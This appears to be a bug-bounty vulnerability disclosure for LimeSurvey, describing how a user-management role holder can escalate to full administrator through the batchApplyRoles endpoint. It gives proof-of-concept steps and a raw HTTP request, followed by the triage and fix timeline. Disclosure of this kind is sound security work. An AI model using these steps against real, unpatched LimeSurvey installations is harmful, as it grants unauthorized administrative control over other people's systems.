Improper Authorization in add role function leads to privilege escalation in limesurvey/limesurvey


Reported on

Jun 28th 2023


The application improperly performs user authorization, resulting in a user with the user management role being able to modify their own permissions or those of others.

Proof of Concept

Step1: The highest-level administrator or an administrator with the permission to create roles creates a role named 'super admin' with full privileges. Assuming the newly created role has an ID of 164.


Step2: The attacker, with user management privileges, sends request POST /index.php?r=userManagement/batchApplyRoles with the sItems parameter as the user_id of the attacker itself and the roleselector parameter as the ID of the 'super admin' role. The user's permissions have now been changed.


POST /index.php?r=userManagement/batchApplyRoles HTTP/2
Cookie: PHPSESSID=1i9laa7dd5it7dek1ck7dspjh9; YII_CSRF_TOKEN=hacker
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 143
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers




The user with the user management role can change the role of anyone, including themselves.

We are processing your report and will contact the limesurvey team within 24 hours. 3 months ago
We have contacted a member of the limesurvey team and are waiting to hear back 3 months ago
2 months ago


Internal tracking number: 18977

tiborpacalat modified the Severity from High (8.3) to Medium (6.7) 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
tiborpacalat validated this vulnerability a month ago
aqngoc has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
tiborpacalat marked this as fixed in 6.2.2+230814 with commit 28010f a month ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
tiborpacalat published this vulnerability a month ago
to join this conversation